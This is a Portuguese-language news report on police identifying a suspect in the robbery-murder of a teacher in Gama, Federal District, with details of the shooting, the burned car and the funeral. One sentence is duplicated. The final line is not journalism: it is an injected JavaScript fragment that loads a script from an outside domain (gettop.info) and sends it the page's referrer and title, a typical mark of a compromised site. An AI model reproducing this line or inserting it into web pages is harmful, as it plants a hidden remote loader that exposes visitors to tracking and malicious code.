O homem suspeito de matar a professora Raquel Costa Miranda foi identificado pela Polícia Civil na manhã desta quinta-feira (5). Há indícios de que a professora tenha sido baleada por Leandro Santos, conhecido como \”Canudo\”. Ele tem várias passagens pela polícia por roubo de carro e cargas.
O comparsa do suspeito, que estava com o celular da vítima, serviu de isca para identificar o autor do latrocínio. Leandro está sendo procurado em uma cidade de Goiás, no Entorno do DF e é considerado, pelas autoridades, foragido.
Raquel foi morta ao ver um homem mexendo em seu veículo, um Fiat Uno quando saía do Posto de Saúde 5, no Setor Central do Gama. O criminoso aproximou-se da vítima, atirou, pegou a chave do automóvel e fugiu do local. O carro foi encontrado queimado no Novo Gama (GO).
Baleada nas costas e ainda com vida, a professora foi socorrida, mas não resistiu aos ferimentos e morreu no hospital. O corpo dela será velado a partir das 11h no Cemitério do Gama. O enterro está previsto 15h30. Baleada nas costas, a professora ainda foi socorrida com vida, mas não resistiu ao ferimento e morreu no hospital
A professora, ministrava aulas de português em uma escola do Recanto das Emas. Deixa marido e dois filhos, um adolescente de 17 anos e a caçula. Emocionada, uma prima, que não quis se identificar, disse que o marido e a mãe da professora estão muito abalados com a tragédia.
Informações a respeito do paradeiro do autor podem ser repassadas à polícia pelo telefone 197.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;